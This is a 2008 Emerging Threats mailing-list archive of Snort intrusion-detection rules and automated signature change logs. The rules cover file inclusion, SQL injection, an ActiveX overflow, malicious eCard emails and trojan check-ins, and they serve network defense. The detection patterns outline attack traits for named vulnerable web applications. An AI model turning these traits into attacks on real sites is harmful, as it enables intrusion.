> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Sports Clubs Web Panel p Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/index.php?p="; nocase; pcre:"/(\.\.\/){1,}/"; classtype: web-application-attack; reference:url,www.frsirt.com/english/advisories/2008/2550; reference:url,www.milw0rm.com/exploits/6427; sid:8466; rev:1;)
>
> 6. My PHP Dating id parameter SQL Injection
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"My PHP Dating id parameter SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/success_story.php?id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype: web-application-attack; reference:url,secunia.com/advisories/32268; reference:url,www.milw0rm.com/exploits/6754; sid:8467; rev:1;)
>
> Looking forward to your comments, if any, on this week's rules posted...
>
> Thanks & Regards,
> StillSecure

From jonkman at jonkmans.com Fri Oct 17 14:20:15 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 17 Oct 2008 14:20:15 -0400
Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-17-2008
In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2909@webmail.latis.com>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2909@webmail.latis.com>
Message-ID: <48F8D75F.6060502@jonkmans.com>

signatures wrote:
> 4. Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET any ( msg:"Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow"; flow:to_client,established; content:"CLSID"; nocase; content:"FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2"; nocase; content:"PlainTextPassword"; nocase; classtype:successful-user; reference:url,www.milw0rm.com/exploits/6761; reference:bugtraq,31783; sid:8465; rev:1;)

Can we port limit this any?

Matt

From signatures at stillsecure.com Fri Oct 17 15:43:56 2008
From: signatures at stillsecure.com (signatures)
Date: Fri, 17 Oct 2008 13:43:56 -0600
Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-17-2008
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2909@webmail.latis.com> <48F8D75F.6060502@jonkmans.com>
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290A@webmail.latis.com>

The exploit is pretty vague but we should be able to narrow down the ports. Let us confirm and we will send you an update once we've tested it.

Thanks & Regards,
StillSecure

-----Original Message-----
From: Matt Jonkman [mailto:jonkman at jonkmans.com]
Sent: Fri 10/17/2008 12:20 PM
To: signatures
Cc: emerging-sigs at emergingthreats.net
Subject: Re: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-17-2008

signatures wrote:
> 4. Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET any ( msg:"Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow"; flow:to_client,established; content:"CLSID"; nocase; content:"FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2"; nocase; content:"PlainTextPassword"; nocase; classtype:successful-user; reference:url,www.milw0rm.com/exploits/6761; reference:bugtraq,31783; sid:8465; rev:1;)

Can we port limit this any?

Matt
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081017/901de3b1/attachment.html

From emerging at emergingthreats.net Fri Oct 17 16:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Fri, 17 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081017200008.1D76E4502B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Fri Oct 17 16:00:08 2008 [***]

[+++] Added rules: [+++]
2008667 - ET TROJAN Backdoor.Win32.Agent.fvt Checkin (emerging-virus.rules)
2008668 - ET WEB_SPECIFIC myEvent viewevent.php SQL Injection (emerging-web_sql_injection.rules)
2008669 - ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection (emerging-web_sql_injection.rules)
2008670 - ET WEB_SPECIFIC SweetCMS page SQL Injection (emerging-web_sql_injection.rules)
2008671 - ET WEB_SPECIFIC Sports Clubs Web Panel p Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2008672 - ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection (emerging-web_sql_injection.rules)

[+++] Added non-rule lines: [+++]
-> Added to emerging-sid-msg.map (6):
2008667 || ET TROJAN Backdoor.Win32.Agent.fvt Checkin
2008668 || ET WEB_SPECIFIC myEvent viewevent.php SQL Injection || url,www.milw0rm.com/exploits/6760 || bugtraq,31773
2008669 || ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection || url,www.milw0rm.com/exploits/6758 || bugtraq,31771
2008670 || ET WEB_SPECIFIC SweetCMS page SQL Injection || url,packetstorm.linuxsecurity.com/0810-exploits/sweetcms-sql.txt || url,secunia.com/Advisories/32277/
2008671 || ET WEB_SPECIFIC Sports Clubs Web Panel p Parameter Local File Inclusion || url,www.milw0rm.com/exploits/6427 || url,www.frsirt.com/english/advisories/2008/2550
2008672 || ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection || url,www.milw0rm.com/exploits/6754 || url,secunia.com/advisories/32268
-> Added to emerging-sid-msg.map.txt (6):
2008667 || ET TROJAN Backdoor.Win32.Agent.fvt Checkin
2008668 || ET WEB_SPECIFIC myEvent viewevent.php SQL Injection || url,www.milw0rm.com/exploits/6760 || bugtraq,31773
2008669 || ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection || url,www.milw0rm.com/exploits/6758 || bugtraq,31771
2008670 || ET WEB_SPECIFIC SweetCMS page SQL Injection || url,packetstorm.linuxsecurity.com/0810-exploits/sweetcms-sql.txt || url,secunia.com/Advisories/32277/
2008671 || ET WEB_SPECIFIC Sports Clubs Web Panel p Parameter Local File Inclusion || url,www.milw0rm.com/exploits/6427 || url,www.frsirt.com/english/advisories/2008/2550
2008672 || ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection || url,www.milw0rm.com/exploits/6754 || url,secunia.com/advisories/32268
-> Added to emerging-virus.rules (1):
#re 4bde1bc2f7b6d4e11b1a570aaa52df57

[---] Removed non-rule lines: [---]
-> Removed from emerging-sid-msg.map (2):
2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
-> Removed from emerging-sid-msg.map.txt (2):
2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From jonkman at jonkmans.com Fri Oct 17 16:05:21 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 17 Oct 2008 16:05:21 -0400
Subject: [Emerging-Sigs] Signatures on Malware E-mail and XSS Attacks
In-Reply-To: <48F895B8.1020706@secpod.com>
References: <48F895B8.1020706@secpod.com>
Message-ID: <48F8F001.1050004@jonkmans.com>

Good sigs Veerendra. The ecard one is great; it should apply to many attacks for a very long time.
Posting now, thanks

Matt

Veerendra GG wrote:
> # 14/10/2008 Microsoft PicturePusher XSS
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Microsoft PicturePusher ActiveX Cross Site File Upload Attack"; content:"clsid"; nocase; content:"507813C3-0B26-47AD-A8C0-D483C7A21FA7"; nocase; pcre:"/http\://.*?[\w]{4,}=1/i"; pcre:"/(PostURL|AddSeperator|AddString|Post)/i"; reference:url,milw0rm.com/exploits/6699; classtype:web-application-attack; sid:9031; rev:1;)
>
> # 16/10/2008 eCard Email Malware Attack
> alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"eCard email malware attack - Trojan"; flow:established,to_server; content:"|0d 0a|Subject\: You have received an eCard"; nocase; content:"e-card.zip"; nocase; classtype:trojan-activity; reference:url,www.sophos.com/blogs/gc/g/2008/10/15/you-have-not-received-an-ecard/; sid:9032; rev:1;)
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From emerging at emergingthreats.net Sat Oct 18 16:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 18 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081018200008.650A445026@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sat Oct 18 16:00:08 2008 [***]

[+++] Added rules: [+++]
2008673 - ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack (emerging-exploit.rules)
2008674 - ET TROJAN Likely eCard Malware Laden Email Inbound (emerging-virus.rules)
2008675 - ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Start (emerging-virus.rules)
2008676 - ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Server Reply (emerging-virus.rules)
2008677 - ET TROJAN Backdoor.Win32.Assasin.20.C Control Channel Client Reply (emerging-virus.rules)

[+++] Added non-rule lines: [+++]
-> Added to emerging-exploit.rules (1):
#by Veerendra at secpod
-> Added to emerging-sid-msg.map (5):
2008673 || ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack || url,milw0rm.com/exploits/6699
2008674 || ET TROJAN Likely eCard Malware Laden Email Inbound || url,www.sophos.com/blogs/gc/g/2008/10/15/you-have-not-received-an-ecard/
2008675 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Start
2008676 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Server Reply
2008677 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Channel Client Reply
-> Added to emerging-sid-msg.map.txt (5):
2008673 || ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack || url,milw0rm.com/exploits/6699
2008674 || ET TROJAN Likely eCard Malware Laden Email Inbound || url,www.sophos.com/blogs/gc/g/2008/10/15/you-have-not-received-an-ecard/
2008675 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Start
2008676 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Server Reply
2008677 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Channel Client Reply
-> Added to emerging-virus.rules (2):
#re c6f326609487aaae451366728ec5cdd9
#by Veerendra at secpod

From emerging at emergingthreats.net Sat Oct 18 18:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 18 Oct 2008 18:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes
Message-ID: <20081018220008.3BFF745026@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sat Oct 18 18:00:08 2008 [***]

[+++] Added rules: [+++]
2008654 - ET SCAN SQLix SQL Injection Vector Scan (emerging-scan.rules)
2008655 - ET MALWARE Frequently Used Fake trojan downloader User Agent (emerging-malware.rules)
2008656 - ET MALWARE AV2010 Rogue Security Application User-Agent (AV2010) (emerging-malware.rules)
2008657 - ET MALWARE Suspicious User-Agent Detected (Compatible) (emerging-malware.rules)
2008658 - ET MALWARE Suspicious User-Agent Detected (GetUrlSize) (emerging-malware.rules)
2008659 - ET MALWARE Suspicious User-Agent Detected (DigitAl56K/6.3) (emerging-malware.rules)
2008660 - ET TROJAN Torpig Infection Reporting (emerging-virus.rules)
2008661 - ET TROJAN Zbot/Zeus HTTP POST (emerging-virus.rules)
2008662 - ET TROJAN Generic PSW Agent server reply (emerging-virus.rules)
2008663 - ET MALWARE Suspicious User-Agent Detected (aguarovex-loader v3.221) (emerging-malware.rules)
2008664 - ET TROJAN Generic Dropper HTTP Bot grabbing config (emerging-virus.rules)
2008665 - ET TROJAN Obfiscator.vc or Related Infection Checkin (emerging-virus.rules)
2008666 - ET TROJAN Delf Key Checkin (Clicker.Win32.Delf.afl) (emerging-virus.rules)
2008667 - ET TROJAN Backdoor.Win32.Agent.fvt Checkin (emerging-virus.rules)
2008668 - ET WEB_SPECIFIC myEvent viewevent.php SQL Injection (emerging-web_sql_injection.rules)
2008669 - ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection (emerging-web_sql_injection.rules)
2008670 - ET WEB_SPECIFIC SweetCMS page SQL Injection (emerging-web_sql_injection.rules)
2008671 - ET WEB_SPECIFIC Sports Clubs Web Panel p Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2008672 - ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection (emerging-web_sql_injection.rules)
2008673 - ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack (emerging-exploit.rules)
2008674 - ET TROJAN Likely eCard Malware Laden Email Inbound (emerging-virus.rules)
2008675 - ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Start (emerging-virus.rules)
2008676 - ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Server Reply (emerging-virus.rules)
2008677 - ET TROJAN Backdoor.Win32.Assasin.20.C Control Channel Client Reply (emerging-virus.rules)

[///] Modified active rules: [///]
2008549 - ET MALWARE Systemdoctor.com/Antivir2008 related Fake Anti-Virus User-Agent (AntivirXP) (emerging-malware.rules)
2008640 - ET SCAN SIP erase_registrations/add registrations attempt (emerging-voip.rules)
2008646 - ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC (emerging.rules)
2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules)
2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules)
2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules)
2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules)
2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules)
2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules)
2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules)
2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules)
2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules)
2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules)
2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules)
2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules)
2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules)
2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules)
2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules)
2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules)
2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules)
2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules)
2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules)
2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules)
2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules)
2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules)
2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)

[+++] Added non-rule lines: [+++]
-> Added to emerging-drop-BLOCK.rules (2):
# VERSION 1330
# Generated 2008-10-18 00:03:02 EDT
-> Added to emerging-drop.rules (2):
# VERSION 1330
# Generated 2008-10-18 00:03:02 EDT
-> Added to emerging-exploit.rules (1):
#by Veerendra at secpod
-> Added to emerging-malware.rules (3):
#by jeremy conway
# ref: 6bbaadcf801e9026d27521ae3f093fe0
# ref: 08e90268f52d942927c9f89fc9b796fb
-> Added to emerging-sid-msg.map (24):
2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category\:OWASP_SQLiX_Project
2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent
2008656 || ET MALWARE AV2010 Rogue Security Application User-Agent (AV2010)
2008657 || ET MALWARE Suspicious User-Agent Detected (Compatible)
2008658 || ET MALWARE Suspicious User-Agent Detected (GetUrlSize)
2008659 || ET MALWARE Suspicious User-Agent Detected (DigitAl56K/6.3)
2008660 || ET TROJAN Torpig Infection Reporting
2008661 || ET TROJAN Zbot/Zeus HTTP POST
2008662 || ET TROJAN Generic PSW Agent server reply
2008663 || ET MALWARE Suspicious User-Agent Detected (aguarovex-loader v3.221)
2008664 || ET TROJAN Generic Dropper HTTP Bot grabbing config
2008665 || ET TROJAN Obfiscator.vc or Related Infection Checkin
2008666 || ET TROJAN Delf Key Checkin (Clicker.Win32.Delf.afl)
2008667 || ET TROJAN Backdoor.Win32.Agent.fvt Checkin
2008668 || ET WEB_SPECIFIC myEvent viewevent.php SQL Injection || url,www.milw0rm.com/exploits/6760 || bugtraq,31773
2008669 || ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection || url,www.milw0rm.com/exploits/6758 || bugtraq,31771
2008670 || ET WEB_SPECIFIC SweetCMS page SQL Injection || url,packetstorm.linuxsecurity.com/0810-exploits/sweetcms-sql.txt || url,secunia.com/Advisories/32277/
2008671 || ET WEB_SPECIFIC Sports Clubs Web Panel p Parameter Local File Inclusion || url,www.milw0rm.com/exploits/6427 || url,www.frsirt.com/english/advisories/2008/2550
2008672 || ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection || url,www.milw0rm.com/exploits/6754 || url,secunia.com/advisories/32268
2008673 || ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack || url,milw0rm.com/exploits/6699
2008674 || ET TROJAN Likely eCard Malware Laden Email Inbound || url,www.sophos.com/blogs/gc/g/2008/10/15/you-have-not-received-an-ecard/
2008675 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Start
2008676 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Server Reply
2008677 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Channel Client Reply
-> Added to emerging-sid-msg.map.txt (24):
2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category\:OWASP_SQLiX_Project
2008655 || ET MALWARE Frequently Used Fake trojan downloader User Agent
2008656 || ET MALWARE AV2010 Rogue Security Application User-Agent (AV2010)
2008657 || ET MALWARE Suspicious User-Agent Detected (Compatible)
2008658 || ET MALWARE Suspicious User-Agent Detected (GetUrlSize)
2008659 || ET MALWARE Suspicious User-Agent Detected (DigitAl56K/6.3)
2008660 || ET TROJAN Torpig Infection Reporting
2008661 || ET TROJAN Zbot/Zeus HTTP POST
2008662 || ET TROJAN Generic PSW Agent server reply
2008663 || ET MALWARE Suspicious User-Agent Detected (aguarovex-loader v3.221)
2008664 || ET TROJAN Generic Dropper HTTP Bot grabbing config
2008665 || ET TROJAN Obfiscator.vc or Related Infection Checkin
2008666 || ET TROJAN Delf Key Checkin (Clicker.Win32.Delf.afl)
2008667 || ET TROJAN Backdoor.Win32.Agent.fvt Checkin
2008668 || ET WEB_SPECIFIC myEvent viewevent.php SQL Injection || url,www.milw0rm.com/exploits/6760 || bugtraq,31773
2008669 || ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection || url,www.milw0rm.com/exploits/6758 || bugtraq,31771
2008670 || ET WEB_SPECIFIC SweetCMS page SQL Injection || url,packetstorm.linuxsecurity.com/0810-exploits/sweetcms-sql.txt || url,secunia.com/Advisories/32277/
2008671 || ET WEB_SPECIFIC Sports Clubs Web Panel p Parameter Local File Inclusion || url,www.milw0rm.com/exploits/6427 || url,www.frsirt.com/english/advisories/2008/2550
2008672 || ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection || url,www.milw0rm.com/exploits/6754 || url,secunia.com/advisories/32268
2008673 || ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack || url,milw0rm.com/exploits/6699
2008674 || ET TROJAN Likely eCard Malware Laden Email Inbound || url,www.sophos.com/blogs/gc/g/2008/10/15/you-have-not-received-an-ecard/
2008675 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Start
2008676 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Server Reply
2008677 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Channel Client Reply
-> Added to emerging-virus.rules (8):
#re c6f326609487aaae451366728ec5cdd9
#re 4bde1bc2f7b6d4e11b1a570aaa52df57
# ref: c2a3a87735f8c5e11de82c52c94aefc7
#by Veerendra at secpod
#re 7a60eada62a331c793ba066e43bfc4f2
# ref: 5742862edc6fddd3f51bf9d07c8d7aba
#by Paul Dokas
# ref: 940fc0b0d523be104a96b09871e42b1e

[---] Removed non-rule lines: [---]
-> Removed from emerging-drop-BLOCK.rules (2):
# VERSION 1323
# Generated 2008-10-11 00:03:02 EDT
-> Removed from emerging-drop.rules (2):
# VERSION 1323
# Generated 2008-10-11 00:03:02 EDT
-> Removed from emerging-sid-msg.map (12):
2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500062 || ET COMPROMISED Known Compromised or Hostile Host Traffic (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500063 || ET COMPROMISED Known Compromised or Hostile Host Traffic (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500064 || ET COMPROMISED Known Compromised or Hostile Host Traffic (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500065 || ET COMPROMISED Known Compromised or Hostile Host Traffic (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500066 || ET COMPROMISED Known Compromised or Hostile Host Traffic (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510062 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510063 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510064 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510065 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510066 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
-> Removed from emerging-sid-msg.map.txt (12):
2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500062 || ET COMPROMISED Known Compromised or Hostile Host Traffic (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500063 || ET COMPROMISED Known Compromised or Hostile Host Traffic (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500064 || ET COMPROMISED Known Compromised or Hostile Host Traffic (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500065 || ET COMPROMISED Known Compromised or Hostile Host Traffic (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500066 || ET COMPROMISED Known Compromised or Hostile Host Traffic (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510062 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510063 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510064 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510065 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510066 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From emerging at emergingthreats.net Sun Oct 19 16:00:07 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sun, 19 Oct 2008 16:00:07 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081019200007.DEC4445026@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sun Oct 19 16:00:07 2008 [***]

[*] Rules modifications: [*]
None.

[+++] Added non-rule lines: [+++]
-> Added to emerging-sid-msg.map (2):
2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org
2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org
-> Added to emerging-sid-msg.map.txt (2):
2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org
2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org

From signatures at stillsecure.com Mon Oct 20 08:32:53 2008
From: signatures at stillsecure.com (signatures)
Date: Mon, 20 Oct 2008 06:32:53 -0600
Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-17-2008
